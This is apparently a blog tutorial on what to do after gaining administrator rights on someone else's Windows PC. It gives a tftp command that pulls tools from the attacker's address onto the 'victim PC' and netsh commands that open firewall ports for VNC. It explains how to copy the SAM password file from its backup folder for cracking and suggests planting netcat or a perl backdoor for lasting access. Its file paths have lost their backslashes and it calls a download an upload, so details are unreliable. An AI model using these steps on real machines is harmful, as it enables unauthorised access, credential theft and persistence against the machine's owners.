In this post I’ll write about what to do once you gain administrative privileges on a Windows PC. There’s lot that you can do, depending upon your inclinations (I hope benign).
Don’t ask me how to get admin rights in first place. Figure that out yourself.
Maybe I’ll write something on that someday, but not now.
Anyhow, once you get in open a windows command shell.
Here are a few things you might like to do:
1) Uploading/downloading files
First thing you might do is uploading a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start tftp service/daemon on your PC first and place the files you want to upload in the programs working directory. In most linux versions, its /tmp
Type the following command to upload netsh.exe file.
C:WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe
Here
-i specifies binary transfer mode
GET tells the victim PC to fetch the file from remote PC. You can use PUT to copy data onto a remote PC
192.168.1.10 is your ip
First netsh.exe is the file you want to upload
Second netsh.exe is the filename you want to keep in victim PC. You can change it to anything you want.
2. Editing network settings
The file netsh.exe is a Windows program for editing network related settings of a PC. Most XP PCs don’t have it by default. You’ll have to upload it. In this case, it’s used to open certain ports in Windows Firewall, that otherwise could be blocked. VNC uses ports 5900 and 5800 for communications. You can edit the firewall setings to unblock these ports by using these commands:
netsh firewall set portopening tcp 5800
netsh firewall set portopening tcp 5900
netsh.exe firewall set portopening udp 5900
This is just an example. You can use this command to block or unblock any port. Keep in mind, unblocking a particular port doesn’t mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use, unless telnet service is started on that PC.
3). Copying SAM
SAM file contains list of all the users and corresponding passwords in Windows. Though it’s encryption can be hard to break depending upon password strength, it’s a very juicy target. There are quite a few paid and free software to do that. It’s default location is
C:windowssystem32config
It’s not possible to copy the SAM file directly as it’s a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in
C:windowsrepair
You can copy this file to your own PC unlike original SAM.
4). Uploading a back-door
A back-door program for example netcat is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily. So it’s slightly out of fashion. If that’s the case, you can try using some script based back-doors like Matahari. It’s a perl script. Only downside is that the target PC should have perl installed which most windows PCs don’t have.
Linux fares better in this case. Another good option is VNC.
That’s enough for now. Let me know if you have any suggestions or corrections.